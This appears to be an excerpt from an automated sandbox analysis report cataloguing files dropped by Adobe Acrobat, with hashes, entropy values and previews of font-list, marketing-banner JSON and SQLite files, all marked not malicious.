                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                              Malicious:false
                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):295
                                                                              Entropy (8bit):5.379931544406748
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJM3g98kUwPeUkwRe9:YvXKXht8DZc0vnvGMbLUkee9
                                                                              MD5:A24382EC51084603DE7B7E5F1924E2A2
                                                                              SHA1:5606F2B519AD7EF260403004597E086C1F58A690
                                                                              SHA-256:8113D3B2711B1C5BEE9DF879AF6D8016A43D248B2D2885C6815FF3CA3F826565
                                                                              SHA-512:11DEAE164D23A99E01C251A4ED80B083754AE045BE870DD4544C1FF261D43726741531399768671FFCF0695AE5D70778E5A443DEA96F7CAC5A1458BCBC88D39A
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):294
                                                                              Entropy (8bit):5.328620680102745
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfBoTfXpnrPeUkwRe9:YvXKXht8DZc0vnvGWTfXcUkee9
                                                                              MD5:5264E939C8FFD2C956D2957F32DA4E69
                                                                              SHA1:B039269DEC76D074D93A9574EC10111FF94E9043
                                                                              SHA-256:429008B73B0FA62253340167FC9F0E2DCF6DF4373930D75F4BDC7F878744E5B3
                                                                              SHA-512:67A0607179BA51A66F3641E98FC6D401C5F2ED3182BB5D1ECE008DA54BCE229D508E9EE2F8F289D4D49D7739FFEC47B37F07631E4520129894D7AB7F48095F6A
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):294
                                                                              Entropy (8bit):5.3073268943296235
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfBD2G6UpnrPeUkwRe9:YvXKXht8DZc0vnvGR22cUkee9
                                                                              MD5:BA514A0ADF3267BBB0778AA2AE2C2023
                                                                              SHA1:E72259D9E2A3FEDE42634C9B7B3C47FAB01CBC60
                                                                              SHA-256:29E37DE3F39E8329726C91C08F473C189D4602DFCB72AC9819706754CEB073CE
                                                                              SHA-512:628D323E3467B44C58E5EEFC9901F0115091DCD6565A1ED0C479B63694A3A8E2CBB5A89455888271BC8425AF94933E97E5FFD1E75A83629358D7978DBBB8FB08
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):285
                                                                              Entropy (8bit):5.367523389482242
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfPmwrPeUkwRe9:YvXKXht8DZc0vnvGH56Ukee9
                                                                              MD5:6C98E8D0DA579DAECA54720772D6F25B
                                                                              SHA1:45E6FD67850FF5A222C758004B588D95ECE9F5DC
                                                                              SHA-256:F71412994C9B73EC41860D3963546F28AF937A9A14D24EB67F3B45E0F9246A0E
                                                                              SHA-512:DA263842B05FD33C0CB55E70A5C8C520039A40E6E9704C10AAF322B14F8BA47E29A292D9C7E6507BA93CE89B80065DBF7989E5CB72106E1C01A9DAA8EB896B12
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1123
                                                                              Entropy (8bit):5.69400188660464
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6XhmDzvn0pLgE9cQx8LennAvzBvkn0RCmK8czOCCSz:YvmmPP0hgy6SAFv5Ah8cv/z
                                                                              MD5:EA3537FE12F1DCCAD3C402795C4D7CB5
                                                                              SHA1:9C77F9C7C0C36ABFD1B76EDA7C5AC3625A041724
                                                                              SHA-256:EDBEA2AC8894E7871F1D97B6A1F6F348C73DAAFD3084A3242984E2C5249335DE
                                                                              SHA-512:A03C9CEC6F21E56F26CB5970E4CC39F0D135B51043F8EAFDD818DA1CFF2978998313DDA4FA36E1D73BA25A9B7876DA77EA3DFDB9D59D96278FF2CCA082E265C3
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):289
                                                                              Entropy (8bit):5.318138444740921
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJf8dPeUkwRe9:YvXKXht8DZc0vnvGU8Ukee9
                                                                              MD5:5C70AB7B3CC69EB3F758DD2BA68E7618
                                                                              SHA1:F5DBF976CEE4AD439B4C8AC90693E4185991C598
                                                                              SHA-256:C56214B08F7176E57E81D964329EC651BF6BE5D14A627A0D11357D127499DA8F
                                                                              SHA-512:C08F97B6EA5169675EAC7E8711560E22DCFA9953A889A6638D13E7E3C17CF0AF42B64DE773C048518597D38D964FCE4F9ED749E886BB896494BBFDE6B470C1D8
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):292
                                                                              Entropy (8bit):5.321834528494858
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfQ1rPeUkwRe9:YvXKXht8DZc0vnvGY16Ukee9
                                                                              MD5:57B78C54EB23578D35B3DD1E4EE2AC41
                                                                              SHA1:D6ADF19ADA55E093E17F11FA5594DDD7616F6302
                                                                              SHA-256:872B170B219357DB38D234CF22BFABE94D5105EC3B3EC91444EA40CF86469F9F
                                                                              SHA-512:3476B70BE19C406720776008CCED158C42AA0EFADAAE3C592594FB55F7186535989AF78B798B2D4EC70E52AA955DD1E6A094C12D8058F895E106B779DD055995
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):289
                                                                              Entropy (8bit):5.329208003233658
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfFldPeUkwRe9:YvXKXht8DZc0vnvGz8Ukee9
                                                                              MD5:8F3DC841FF7DF5FE97D4ACC0BACFC894
                                                                              SHA1:C2387B1DA64287F2DC1039335587EDF00DB3CF39
                                                                              SHA-256:0295BA81B3822E9CC6F33A3B01342A2FE79514DE4B7379C5035798338FBC8293
                                                                              SHA-512:FE5D8C23540D77ED5E86D1359EE851B9779DB4343776C9474842E973970A514443ECF41F840812806CE1D0D54C568DEBB5E01D67CCE8A42222CFF11D90787896
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):295
                                                                              Entropy (8bit):5.343374485739818
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfzdPeUkwRe9:YvXKXht8DZc0vnvGb8Ukee9
                                                                              MD5:C4667CD5B170FED740E9CD4B325777E0
                                                                              SHA1:99E39AE3EB2A4C33FF6F64EF19BF9561B03A9517
                                                                              SHA-256:4476DDF6EE8161F6AE822183AD971AF8AD31DE26B7498ED4B1DC5C85D541A74A
                                                                              SHA-512:1B181D05FB1EB8329B8F503265DE22C912335EE5B9E719B191673A2D54682ADF01867BC6282C1B9F3E976DCCC6C5EF532C3A317C946829D90137D68E6092AE2B
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):289
                                                                              Entropy (8bit):5.324222905902701
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfYdPeUkwRe9:YvXKXht8DZc0vnvGg8Ukee9
                                                                              MD5:CAF0CB1DB304F1D811CEFC4E4BDDEA19
                                                                              SHA1:DA6665D59E72764E3CDDEB5DB7348DE3EF66D8F0
                                                                              SHA-256:CEC90C63356DA9F5ED8330FB9B4C4EC65428DB866C63D25597D1E803E15D02A8
                                                                              SHA-512:D8A81AB022FC762391EC98E644EB0B12B732C26BAE7F56AE270A05CCF75A0CF33FA7A939135E65D3236E1DF36B1AE16720DC21312425D6261F1AD29F130407E4
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):284
                                                                              Entropy (8bit):5.310699738336536
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJf+dPeUkwRe9:YvXKXht8DZc0vnvG28Ukee9
                                                                              MD5:334C85C3B32821B656BF016080561459
                                                                              SHA1:642D679305A77E945B16F4F8DCF88F31FF8874B6
                                                                              SHA-256:B6DCB78EF4FBAA2F575B36569B0EB6B79FADF719565314F0105C6B1430D9CE99
                                                                              SHA-512:3EE08F680688354A98415A3198C26AA975CEFCA2C5A26367242693DD78C343826995B86757C5E660A25B7CC5ECA7AAD17C9C8D04B3E0730D842F7567932FA9FE
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):291
                                                                              Entropy (8bit):5.307603523123625
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfbPtdPeUkwRe9:YvXKXht8DZc0vnvGDV8Ukee9
                                                                              MD5:76C54E58F71671D02EE05ED1FBEA573D
                                                                              SHA1:EA27266374CD5A1BB9E291A43FD0B4F1C82187C2
                                                                              SHA-256:197379409A5BD488991C4D5FDBAD73D7C62D5E3A5622F1E92B6F792A21E89DA1
                                                                              SHA-512:FECE33D56F09A2F74F6B50EFF05B66E0D44360E84685359FB4153C1EE18C3444A900878FB2135946B5C2059983528833A71BC5471C90077C6804077ADC0E70CE
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):287
                                                                              Entropy (8bit):5.312275876339694
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJf21rPeUkwRe9:YvXKXht8DZc0vnvG+16Ukee9
                                                                              MD5:D0B7CDF392041BCD70B2CA9B7E2ACCF0
                                                                              SHA1:B3842CEB1CDCEE379601B235D27FE29FA3256F37
                                                                              SHA-256:5E99F679F048627FB861131BEDB8FD7B8B84EF92F0461E02E2416B8C80F953F8
                                                                              SHA-512:4E9119CC30C5294869B2CA3B457BC5CC8107FB7FE4A61F282A72E505D6925529C6DE608B4C020FF0C2B97EFB4170AD868D4922F5703406B725BF7E3350EBB47E
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1090
                                                                              Entropy (8bit):5.6699009621905665
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6XhmDzvnwamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSz:YvmmPP2BgkDMUJUAh8cvMz
                                                                              MD5:AD782A3F604CEB1CEF03E2199F001093
                                                                              SHA1:54CEED6819BFE5EB4C3FFDF30E6A495C2B2D38CD
                                                                              SHA-256:E5005C13CC5599F669619B533AA41F7A99FEFE92A701909ED8E2F89D54D658A0
                                                                              SHA-512:28919084D39AC8DFA52F9E6FC8CEC57A739A877C95601BB9C9A611B30FBA1B1F99615CCEB4AA83F3A5BEC3AC6F09F948B5FCFEC77C3EB642F6F41C3D2579EC44
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):286
                                                                              Entropy (8bit):5.290310275362236
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfshHHrPeUkwRe9:YvXKXht8DZc0vnvGUUUkee9
                                                                              MD5:0A625E876C4F152AAC11E01B0CDC0358
                                                                              SHA1:4A4D61ABA6502AD3446E3A07035274DCFC824A73
                                                                              SHA-256:6250F98B8E102CCDF7189901778B0C24FEF9269575128550B325AFB1FA4E3E31
                                                                              SHA-512:8D22AAF67CB8283DDF03B4CD5368F32B113295EAA49BA6DCC2BDE3A185E082601A1B1B0E85BD8EBD55D96822810C803C2CAC8FA3BB14422A228AD4243512ED92
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):282
                                                                              Entropy (8bit):5.294015243600842
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJTqgFCrPeUkwRe9:YvXKXht8DZc0vnvGTq16Ukee9
                                                                              MD5:5EC33066FD1404FCB813ACB3B775E4E7
                                                                              SHA1:D791CEBADC8C1F8A6831C5713FFC779C28ACFE0F
                                                                              SHA-256:87304086D8B8E123EBD613CCB7360C1985547E1133922D8F6088C3AEAD04C040
                                                                              SHA-512:CC0608536DB11A7373995F130D0E63F6D2322D0E3E5BD27588096103BB1271A1C4F8041F141B2B5CE916283D13872A75A67B45706737C43F2D70A133DCBD3BC7
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):0.8112781244591328
                                                                              Encrypted:false
                                                                              SSDEEP:3:e:e
                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                              Malicious:false
                                                                              Preview:....
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):2814
                                                                              Entropy (8bit):5.127001091927312
                                                                              Encrypted:false
                                                                              SSDEEP:48:YfUt1jQDukoi8po8PSOfBCTGpmHYBXm/iGP9glesr:gUt1jQKkoNe86+CTSmHYojFglXr
                                                                              MD5:EE06D5E7603903C94BB552800D8198F7
                                                                              SHA1:DD95DA3A3B0FADA5E23C8A6E5E05C9A37754AE48
                                                                              SHA-256:B79927DB87A18B4A80A860C4125A0D5A0D782A1B3907FA3CD58CBC7ADEBF7188
                                                                              SHA-512:3E1C534288538785629648BD5F9C756581EBF6B764D6886ECC8B670402D302812C1D93EB021F4AA431204985D6207F41B4135DEBF457613727E5686F2B1DABE0
                                                                              Malicious:false
                                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"61a9ad5db54ea9925b61cbae05c56d0b","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734552030000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"bfdd1986ebdeb33abf1edcdf7b5c95d1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734552030000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"b09e3590796d6237e4084fd19e76e0a1","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734552030000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"aac2d8e0662444f2b15ae9df2bb43cbd","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734552030000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"61477da23926cf6df172e63c9c1a6234","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734552030000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"e531d7c0d38eac84001df5d3182638c7","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                              Category:dropped
                                                                              Size (bytes):12288
                                                                              Entropy (8bit):1.1876795523328842
                                                                              Encrypted:false
                                                                              SSDEEP:48:TGufl2GL7msEHUUUUUUUUE2SvR9H9vxFGiDIAEkGVvpww:lNVmswUUUUUUUUD+FGSItb
                                                                              MD5:140DCF38E94D869B86758D6C06ABB600
                                                                              SHA1:02283836A081294B72ABF1B62491A1D868E482E1
                                                                              SHA-256:B613316707301FCFBBB3FE2D2EB721A379469265C2D419134A26E8A19569E73A
                                                                              SHA-512:9FF3356E047043D76873760F1FEABD0E6768B1B5A8304D26D437DDEDF2EF3AF00FF2F416B1A8D615CFAE9569CD533DEB143672C328AEDD62357D988972BA99D3
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite Rollback Journal
                                                                              Category:dropped
                                                                              Size (bytes):8720
                                                                              Entropy (8bit):1.6073791538163686
                                                                              Encrypted:false
                                                                              SSDEEP:48:7MRKUUUUUUUUUUEUvR9H9vxFGiDIAEkGVvJqFl2GL7ms67:7rUUUUUUUUUUfFGSIt7KVmsU
                                                                              MD5:5817BB77E5F718FF72F5AC3B5F8B7C78
                                                                              SHA1:FB9401A630E421B486C735ECAB0A3544AF6BE057
                                                                              SHA-256:93AA8DCD519CB232B1D6FFD77322604D1A6BE00A5222D4E9A97459F7F9994BDB
                                                                              SHA-512:9EE3CCD95C18346210BFA7009757493EFB24661FB87F90516CFF512E2BDBB0C31D1C8CAC65ABBAF20C0D09E69F05503B8A4A6FE96CC09FFA94B2439AE16C5B8C
                                                                              Malicious:false
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):66726
                                                                              Entropy (8bit):5.392739213842091
                                                                              Encrypted:false
                                                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgMJ/v8krPRVkTUR1LohsT+J9Yyu:6a6TZ44ADEMhv8krPRTTG9K
                                                                              MD5:9AD63C10272CD9EB6A9CF63B45B67208
                                                                              SHA1:28098BCE17DF16D71758F7DA2CAA781A0C199DA3
                                                                              SHA-256:699D68F9F18166261F2B88B1A126C4E2D7D84922D1EEEBC917271EA56BAD0B58
                                                                              SHA-512:EC28C8C61B6B82E0F2C2E81589693FAB5CF94A5CA7ED250AE2174268930E5BF98975E1495431D669C9653FCEEB63088EE7CDCF95273A4F42F469615F5D5F9587
                                                                              Malicious:false
